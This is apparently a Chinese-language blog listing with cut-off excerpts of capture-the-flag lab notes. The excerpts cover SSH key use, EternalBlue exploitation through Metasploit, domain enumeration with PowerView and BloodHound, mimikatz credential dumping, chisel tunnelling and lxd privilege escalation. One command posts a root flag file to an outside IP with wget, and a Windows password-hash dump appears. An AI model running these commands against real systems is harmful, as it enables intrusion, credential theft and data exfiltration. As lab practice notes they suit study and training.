MoonlitSyntax

镜子续集 Starting Nmap 7.60 ( https://nmap.org ) at 2024-01-30 12:50 GMTNmap scan report for ip-10-10-150-253.eu-west-1.compute.internal (10.10.150.253)Host is up (0.00091s latency).Not shown: 916 closed portsPORT STATE SERVICE VERSION22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)| ssh-hostkey: | 2048 3f:15:19:70:35:fd:dd:0d:07:a0:50:a3:7d:fa:10:a0 (RSA)| 256 a8:67:5c:52:77:02:41:d7:90:e7:ed:32:d2:01:d9:65 (ECDSA)|_ 256 26:92:59:2d:5e:25:90:89:09 ...

扫目录发现key,但是不知道用户是什么,现在可以爆破吧应该,但是他藏在了80端口的源码处 chmod 600 key !!!不然用不了测 ssh上去 测,忘了是拿flag,不一定要提权了 sudo wget --post-file=/root/root_flag.txt 10.14.69.58:9999 但是为什么提权失败呢额额额

一眼永恒之蓝 search ms17–010 type:exploit 使用第一个,就use 0 show option查看信息 set RHOSTS 10.10.139.234 set payload windows/x64/shell/reverse_tcp run 传过来的是WIndowsshell 转换成post/multi/manage/shell_to_meterpreter ctrl + z可以隐藏回话 sessions -l可以列出会话 先选择那个shell模块,指定session,然后run,会产生一个新的session,然后转到那个session上去 sessions -i 3 meterpreter > hashdumpAdministrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::Jon:10 ...

powershell -ep bypass. .\PowerView.ps1Get-NetUser | select cn #枚举域用户Get-NetGroup -GroupName *admin*#枚举域组Invoke-sharefinder #共享文件夹Get-NetComputer -fulldata #系统Get-NetUser . .\SharpHound.ps1Invoke-Bloodhound -CollectionMethod All -Domain CONTROLLER.local -ZipFileName loot.zipscp Administrator@10.10.11.93:20220811025924_loot.zip 20220811025924_loot.zip .\mimikatz.exeprivilege::debuglsadump::lsa /patchhashcat -m 1000 hash.txt /usr/share/wordlists/rockyou.txtlsadump::lsa /inject /name:krbtgt kerberos ...

开个代理 BOX: wget 120.46.78.45/chisel_amd_linux && chmod +x chisel_amd_linux && ./chisel_amd_linux client 120.46.78.45:7000 R:0.0.0.0:7777:socks VPS: ./chisel_amd_linux server -p 7000 --reverse 太麻烦了,现在OpenVPN又有用了 #!/bin/bash# 定义代理使用的端口PORT=1080# 查找监听在指定端口的SSH进程并杀死这些进程echo "正在终止当前在端口$PORT上的SSH SOCKS代理进程..."PID=$(lsof -ti tcp:$PORT)if [ ! -z "$PID" ]; then sudo kill -9 $PID echo "终止进程 $PID."else echo "没有找到在端口$PORT上运行的进程."fi# 重启SSH SOCKS ...

capabilities getcap -r / 2>/dev/null openssl可以 openssl req -x509 -newkey rsa:2048 -keyout /tmp/key.pem -out /tmp/cert.pem -days 365 -nodesopenssl s_server -key /tmp/key.pem -cert /tmp/cert.pem -port 8080 -HTTP 定时任务 pspy lxd 在自己服务器构建镜像,root权限 保存在kali /root/tmp了 lxc image import alpine-v3.19-x86_64-20240305_1446.tar.gz --alias test lxc init test test -c security.privileged=true lxc config device add test test disk source=/ path=/mnt/root recursive=true lxc start test lxc exec test /bin/sh ps:如 ...